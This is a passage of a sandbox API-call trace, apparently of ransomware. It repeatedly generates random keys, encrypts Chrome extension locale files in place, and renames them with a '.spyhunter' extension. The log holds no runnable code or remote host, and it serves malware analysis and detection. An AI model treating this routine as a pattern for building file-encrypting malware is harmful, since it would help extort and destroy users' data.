lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0137.759] GetProcessHeap () returned 0x2c0000 [0137.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0137.759] GetProcessHeap () returned 0x2c0000 [0137.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1f6d0 | out: hHeap=0x2c0000) returned 1 [0137.760] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf230 | out: pbBuffer=0x25cf230) returned 1 [0137.760] GetProcessHeap () returned 0x2c0000 [0137.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0137.760] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf228*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf228*=0x30) returned 1 [0137.760] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0137.761] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json") returned 155 [0137.761] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.761] GetProcessHeap () returned 0x2c0000 [0137.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0137.761] ReadFile (in: hFile=0xec, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf1ec, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf1ec*=0xee, lpOverlapped=0x0) returned 1 [0137.762] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff12, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.762] WriteFile (in: hFile=0xec, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x25cf1ec, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf1ec*=0xee, lpOverlapped=0x0) returned 1 [0137.762] GetProcessHeap () returned 0x2c0000 [0137.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0137.762] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.762] WriteFile (in: hFile=0xec, lpBuffer=0x25cf22c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf1ec, lpOverlapped=0x0 | out: lpBuffer=0x25cf22c*, lpNumberOfBytesWritten=0x25cf1ec*=0x4, lpOverlapped=0x0) returned 1 [0137.762] WriteFile (in: hFile=0xec, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf1ec, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf1ec*=0x30, lpOverlapped=0x0) returned 1 [0137.762] CloseHandle (hObject=0xec) returned 1 [0137.762] GetProcessHeap () returned 0x2c0000 [0137.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0137.762] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json.spyhunter") returned 165 [0137.762] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\messages.json.spyhunter")) returned 1 [0137.763] GetProcessHeap () returned 0x2c0000 [0137.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0137.763] GetProcessHeap () returned 0x2c0000 [0137.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0137.763] GetProcessHeap () returned 0x2c0000 [0137.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1f3c0 | out: hHeap=0x2c0000) returned 1 [0137.764] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf228 | out: pbBuffer=0x25cf228) returned 1 [0137.764] GetProcessHeap () returned 0x2c0000 [0137.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0137.764] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf220*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf220*=0x30) returned 1 [0137.764] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0137.765] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json") returned 155 [0137.765] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.765] GetProcessHeap () returned 0x2c0000 [0137.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0137.765] ReadFile (in: hFile=0xec, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf1e4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf1e4*=0xfd, lpOverlapped=0x0) returned 1 [0137.766] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff03, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.766] WriteFile (in: hFile=0xec, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xfd, lpNumberOfBytesWritten=0x25cf1e4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf1e4*=0xfd, lpOverlapped=0x0) returned 1 [0137.766] GetProcessHeap () returned 0x2c0000 [0137.766] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0137.766] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.766] WriteFile (in: hFile=0xec, lpBuffer=0x25cf224*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf1e4, lpOverlapped=0x0 | out: lpBuffer=0x25cf224*, lpNumberOfBytesWritten=0x25cf1e4*=0x4, lpOverlapped=0x0) returned 1 [0137.766] WriteFile (in: hFile=0xec, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf1e4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf1e4*=0x30, lpOverlapped=0x0) returned 1 [0137.766] CloseHandle (hObject=0xec) returned 1 [0137.766] GetProcessHeap () returned 0x2c0000 [0137.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0137.766] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json.spyhunter") returned 165 [0137.767] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json.spyhunter")) returned 1 [0137.767] GetProcessHeap () returned 0x2c0000 [0137.767] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0137.767] GetProcessHeap () returned 0x2c0000 [0137.767] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0137.767] GetProcessHeap () returned 0x2c0000 [0137.767] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1f0b0 | out: hHeap=0x2c0000) returned 1 [0137.768] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf220 | out: pbBuffer=0x25cf220) returned 1 [0137.768] GetProcessHeap () returned 0x2c0000 [0137.768] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0137.768] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf218*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf218*=0x30) returned 1 [0137.769] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0137.769] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json") returned 155 [0137.769] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.770] GetProcessHeap () returned 0x2c0000 [0137.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0137.770] ReadFile (in: hFile=0xec, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf1dc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf1dc*=0x100, lpOverlapped=0x0) returned 1 [0137.770] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.770] WriteFile (in: hFile=0xec, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x25cf1dc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf1dc*=0x100, lpOverlapped=0x0) returned 1 [0137.771] GetProcessHeap () returned 0x2c0000 [0137.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0137.771] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.771] WriteFile (in: hFile=0xec, lpBuffer=0x25cf21c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf1dc, lpOverlapped=0x0 | out: lpBuffer=0x25cf21c*, lpNumberOfBytesWritten=0x25cf1dc*=0x4, lpOverlapped=0x0) returned 1 [0137.771] WriteFile (in: hFile=0xec, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf1dc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf1dc*=0x30, lpOverlapped=0x0) returned 1 [0137.771] CloseHandle (hObject=0xec) returned 1 [0137.771] GetProcessHeap () returned 0x2c0000 [0137.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0137.771] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json.spyhunter") returned 165 [0137.771] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json.spyhunter")) returned 1 [0137.772] GetProcessHeap () returned 0x2c0000 [0137.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0137.772] GetProcessHeap () returned 0x2c0000 [0137.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0137.772] GetProcessHeap () returned 0x2c0000 [0137.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1eda0 | out: hHeap=0x2c0000) returned 1 [0137.773] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf218 | out: pbBuffer=0x25cf218) returned 1 [0137.773] GetProcessHeap () returned 0x2c0000 [0137.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0137.773] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf210*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf210*=0x30) returned 1 [0137.773] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0137.774] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json") returned 155 [0137.774] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.774] GetProcessHeap () returned 0x2c0000 [0137.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0137.774] ReadFile (in: hFile=0xec, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf1d4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf1d4*=0x10f, lpOverlapped=0x0) returned 1 [0137.775] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffffef1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.775] WriteFile (in: hFile=0xec, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x10f, lpNumberOfBytesWritten=0x25cf1d4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf1d4*=0x10f, lpOverlapped=0x0) returned 1 [0137.775] GetProcessHeap () returned 0x2c0000 [0137.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0137.775] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.775] WriteFile (in: hFile=0xec, lpBuffer=0x25cf214*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf1d4, lpOverlapped=0x0 | out: lpBuffer=0x25cf214*, lpNumberOfBytesWritten=0x25cf1d4*=0x4, lpOverlapped=0x0) returned 1 [0137.775] WriteFile (in: hFile=0xec, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf1d4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf1d4*=0x30, lpOverlapped=0x0) returned 1 [0137.776] CloseHandle (hObject=0xec) returned 1 [0137.776] GetProcessHeap () returned 0x2c0000 [0137.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0137.776] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json.spyhunter") returned 165 [0137.776] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json.spyhunter")) returned 1 [0137.776] GetProcessHeap () returned 0x2c0000 [0137.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0137.777] GetProcessHeap () returned 0x2c0000 [0137.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0137.777] GetProcessHeap () returned 0x2c0000 [0137.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1ea90 | out: hHeap=0x2c0000) returned 1 [0137.778] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf210 | out: pbBuffer=0x25cf210) returned 1 [0137.778] GetProcessHeap () returned 0x2c0000 [0137.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0137.778] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf208*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf208*=0x30) returned 1 [0137.778] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0137.779] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json") returned 155 [0137.779] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.779] GetProcessHeap () returned 0x2c0000 [0137.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0137.779] ReadFile (in: hFile=0xec, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf1cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf1cc*=0x100, lpOverlapped=0x0) returned 1 [0137.780] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.780] WriteFile (in: hFile=0xec, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x25cf1cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf1cc*=0x100, lpOverlapped=0x0) returned 1 [0137.780] GetProcessHeap () returned 0x2c0000 [0137.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0137.780] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.780] WriteFile (in: hFile=0xec, lpBuffer=0x25cf20c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf1cc, lpOverlapped=0x0 | out: lpBuffer=0x25cf20c*, lpNumberOfBytesWritten=0x25cf1cc*=0x4, lpOverlapped=0x0) returned 1 [0137.780] WriteFile (in: hFile=0xec, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf1cc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf1cc*=0x30, lpOverlapped=0x0) returned 1 [0137.780] CloseHandle (hObject=0xec) returned 1 [0137.781] GetProcessHeap () returned 0x2c0000 [0137.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0137.781] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json.spyhunter") returned 165 [0137.781] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\it\\messages.json.spyhunter")) returned 1 [0137.781] GetProcessHeap () returned 0x2c0000 [0137.781] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0137.781] GetProcessHeap () returned 0x2c0000 [0137.781] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0137.781] GetProcessHeap () returned 0x2c0000 [0137.781] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1e780 | out: hHeap=0x2c0000) returned 1 [0137.782] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf208 | out: pbBuffer=0x25cf208) returned 1 [0137.782] GetProcessHeap () returned 0x2c0000 [0137.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0137.783] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf200*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf200*=0x30) returned 1 [0137.783] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 